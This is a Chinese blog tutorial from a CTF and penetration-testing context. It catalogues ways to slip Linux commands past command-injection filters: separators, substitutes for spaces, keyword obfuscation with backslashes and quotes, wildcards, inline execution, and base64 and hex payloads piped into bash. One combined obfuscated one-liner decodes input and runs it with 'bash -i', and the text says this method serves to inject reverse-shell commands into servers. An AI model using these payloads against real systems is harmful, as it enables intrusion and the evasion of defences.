【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)

已于 2024-06-14 14:06:34 修改
阅读量2.7k 收藏 18
点赞数 16
分类专栏: Linux 文章标签: linux 运维 服务器 命令模式
于 2023-09-24 15:47:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67844671/article/details/133239381
版权

 

首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识

分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取:

超详细的网络安全学习笔记icon-default.png?t=N7T8https://m.tb.cn/h.gU0B0pz?tk=fx3VWyN8gIa%20HU0025

不知道怎么获取的可以私信联系我,欢迎技术交流!

一,符号绕过

1-1 分号绕过

用;号隔开每个命令,每个命令按照从左到右的顺序执行,彼此之间不关心是否失败,所有命令都会执行。

cat /etc/passwd;ls -l

1-2 管道符 | 

Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。

cat /etc/passwd | grep bash | wc -l

1-3 & 

格式: command1 & command2

&放在启动参数后面表示设置此进程为后台进程,上面的命令会先执行command2,再执行command1

ping -c 1 baidu.com & ls -l

1-4 && 

格式: command1 && command2 [&& commandx]

&& 表示前一条命令执行成功时,才执行后一条命令

1-4-1 第一种情况

第一个命令错误,第二个命令不会执行 

如:/etc/aini 不存在就会报错,后面的ls也不会执行

cat /etc/aini && ls -l

1-4-2 第二种情况

 所有命令都正确

pwd && ls -l && cat /etc/passwd

1-5 || 

格式:command1 || command2 [|| commandx]

跟&&符号相反,前面那条命令为假才会执行后面的命令

只要有一个命令返回真(命令返回值 $? == 0),后面的命令就不会被执行。–直到返回真的地方停止执行。

cat /etc/aini || pwd

第一个命令结果为假,所以继续执行第二个命令

 1-6 绕过空格

1-6-1 {}绕过

{cat,etc/passwd}

 1-6-2 ${IFS},$IFS$9,${IFS} 绕过

cat${IFS}flag.txt
cat$IFS$9flag.txt
cat${IFS}flag.txt

 1-6-3 <  绕过

cat<flag.txt

1-6-4 <> 绕过 

cat<>flag.txt

1-7 对关键字的绕过

1-7-1 (\)

比如会对cat falg 等一些常用关键字进行检测,可以用 \ 绕过

原理就是\转义符号只对一些特殊符号转义,对字母转义跟不转义效果一样

c\a\t<>f\l\a\g.t\x\t

 1-7-2 '' 绕过

cat fla''g.php

1-7-3 双''来字符串拼接绕过

'fl' + 'ag'  = 'flag'

其实

'fl''ag' = 'flag'

1-7-4 变量绕过 

a=fl;b=ag;cat $a$b.php

1-8 通配符绕过

1-8-1 ? * 来绕过

?在linux里面可以进行代替字母
*在linux里面可以进行模糊匹配

cat<>fl*
cat flag?txt

1-8-2 [范围] 或 {f..h} 来绕过

[a-z]  表示匹配 a~z 

{f..h} 表示f~h 无论是否匹配成功都匹配一遍

cat fla[f-h].*

 分别匹配到了flag.txt和flag.php  

1-9 内联使用

1-9-1 `` 绕过

`` 里面的命令优先执行 

cat `ls | grep fla`

 分别匹配到了flag.txt和flag.php 

 1-9-2 $() 绕过

cat $(ls | grep fla)

二,编码绕过

2-1 base64编码绕过 

经常用此方法来给对方服务器注入反向shell命令

echo Y2F0IGZsYWcudHh0 | base64 -d | bash -i

综合利用

1,绕过空格

2,绕过关键字过滤

3,编码

\e\c\h\o${IFS}Y2F0IGZsYWcudHh0${IFS}|${IFS}\b\a\s\e\6\4${IFS}-\d${IFS}|${IFS}\b\a\s\h${IFS}-\i

2-2 hex编码绕过 

2-2-1 熟悉xxd命令

  -a          缺省忽略转换: 使用‘*’替换空行.
   -b          二进数数据转储 (与 -ps,-i,-r不兼容). 默认为16进制.
   -c cols    每行多少列octets(特制8比特的字节). 默认为16列(-i: 12, -ps: 30).
   -E          使用EBCDIC字符集. 默认为ASCII字符集.
   -e          小端模式转储 (与 -ps,-i,-r不兼容).
   -g          在正常输出中,每组八位字节数. 默认为2个 (-e: 4).
   -h          输出此帮助.
   -i          使用C语言文件样式输出.
   -l len      在len个八位字节后停止.
   -o off      在off个偏移量后开始输出.
   -ps         以在行后添加16进制转储内容的格式输出.
   -r          逆向操作: 转换(或修补) 十六进制内容为二进制内容.
   -r -s off   在off个偏移量后开始转换16进制内容为二进制内容
   -s [+][-]seek  start at <seek> bytes abs. (or +: rel.) infile offset.(没看懂)
   -u          使用大写字母进行十六进制表示.
   -v          显示版本: "xxd V1.10 27oct98 by Juergen Weigert".

 2-2-2 例子

echo 63617420666c61672e747874 | xxd -r -p|bash

  

首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识

分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取:

超详细的网络安全学习笔记icon-default.png?t=N7T8https://m.tb.cn/h.gU0B0pz?tk=fx3VWyN8gIa%20HU0025

不知道怎么获取的可以私信联系我,欢迎技术交流!

学网安的A
关注
  • 16
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
Linux命令执行绕过
SHELLCODE_8BIT的博客
04-19 871
Linux命令执行绕过_5wimming的博客-CSDN博客_linux命令执行绕过 nohub
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5540
linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
命令执行绕过总结
box
07-23 2251
命令执行绕过总结 Linux命令拼接 a=who b=ami $a$b //输出whoami 常用字符使用 & 表示将任务置于后台执行 ; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块 && 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。 || 只有在 || 左边的命令返回假(命令返回值 $? == 1),
命令执行(RCE)面对各种过滤,骚姿势绕过总结
最新发布
HUANGXIN9898的博客
07-09 1070
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
linux命令绕过
qq_46229380的博客
12-18 623
linux命令绕过总结
Linux下的命令执行绕过技巧合集(渗透测试专用)
Thunderclap的博客
02-23 3589
Linux下的命令执行绕过技巧合集(渗透测试专用)
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 5837
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
命令执行绕过
weixin_57439582的博客
03-26 311
ca${21}t a.txt 利用空变量 使用$*和$@,$x(x 代表 1-9),${x}(x>=10)(小于 10 也是可以的) 因为在没有传参的情况下,上面的特殊变量都是为空的。cat$IFS$1$a$b.php 即可获取flag。//base64编码绕过(引号可以去掉) |(管道符) 会把前一个命令的输出作为后一个命令的参数。2.通过执行sh命令执行 (bash被过滤了,不然也可以执行
fuckcdn-通过扫描全网绕过CDN获取网站IP地址
01-16
通过扫描全网绕过CDN获取网站IP地址; 支持winodws/linux; gevent 协程IO 最大化利用资源; masscan扫描,最快能6分钟扫完全网; 支持HTTPS协议; 支持调节masscan的r速率;
linux-kernel-exploitation:与Linux内核安全性和利用有关的链接的集合
02-05
网络安全领域,Linux内核的安全性和利用是至关重要的研究主题。"linux-kernel-exploitation"项目集合了一系列与Linux内核安全相关的链接,这包括漏洞分析、exploit开发、权限提升和安全防护等方面的知识。 1. **...
2023年网络安全比赛--Linux渗透测试中职组(超详细)
Aluxian_的博客
01-20 6268
2.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中waf防火墙文件中的所有的被过滤的字符串内容作为Flag值提交;)dirsearch。3.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag值提交;4.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为Flag值提交;
命令执行各种绕过总结
m0_64815693的博客
10-11 9016
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
常见命令执行的一些绕过方式
qq_53142368的博客
04-26 6526
文章目录一、命令执行二、绕过技巧1.常见管道符2. 空格过滤3. 黑名单绕过4. 绕过长度限制5. ls命令6. 各种读文件命令 一、命令执行 1. php调用外部程序常用的函数: system()—执行shell命令也就是向dos发送一条指令。 shell_exec() — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 exec() —执行外部程序。 passthru() — 执行外部程序并且显示原始输出。 2. 造成命令执行的原因 代码过滤不严格–如使用system函数调用封装
命令执行的一些绕过技巧
m0_55754984的博客
09-14 3611
空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
热门推荐
algae
08-29 1万+
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
linux命令执行绕过,命令执行WAF绕过技巧总结
weixin_31106267的博客
04-29 708
*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。前言如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力,这些WAF并不是想象中毫无破绽,当Web服务器Linux平台时我们就可以利用一些技巧绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF的绕过技巧,Windows平台不在本文考虑范围内。0x01 技巧一:通配符在bash的操作环境中有一...
命令执行绕过姿势总结
Lum1n0us's Blog
02-05 1381
在刷完ctfshow web入门的命令执行后,我准备用这篇博客回顾下命令执行的知识点,也为了以后遇到相似的知识点时方便查阅。(目录的名字都是自己想的) 过滤关键字 1.关键字替换 当cat命令被过滤时,可以用以下命令代替: tac|more|less|curl|nl|tail|sort|strings|head|paste|od -a strings:显示文件中的可打印内容,一般用来查看非文本内容 sort:可针对文本文件的内容,以行为单位来排序。 curl:会发送 GET 请求来获取链接内容到标准输出
linux 设置密码复杂度,但是使用echo 111 | passwd --stdin任然成功
06-06
Linux系统可以通过设置密码复杂度要求来增加用户密码的安全性。例如,可以通过修改/etc/login.defs文件中的PASS_MIN_LEN和PASS_COMPLEXITY参数来设置密码的最小长度和复杂度要求。但是,即使设置了密码复杂度要求,仍然有可能使用命令行工具来绕过该要求,例如使用echo 111 | passwd --stdin命令,让用户将简单密码“111”通过管道直接传递给passwd命令进行设置,而不必满足密码复杂度要求。这种情况下,可以通过更改/etc/pam.d/system-auth文件中的配置,禁用使用stdin方式的密码设置方式来解决。同时也可以结合使用其它安全措施,例如强制用户使用ssh key登录或者加强本地和网络的安全措施等方式来提高系统的整体安全性。总之,仅仅靠设置密码复杂度要求可能不足以保障系统的安全,还需要采用全面的措施来防范潜在的安全风险。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学网安的A

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值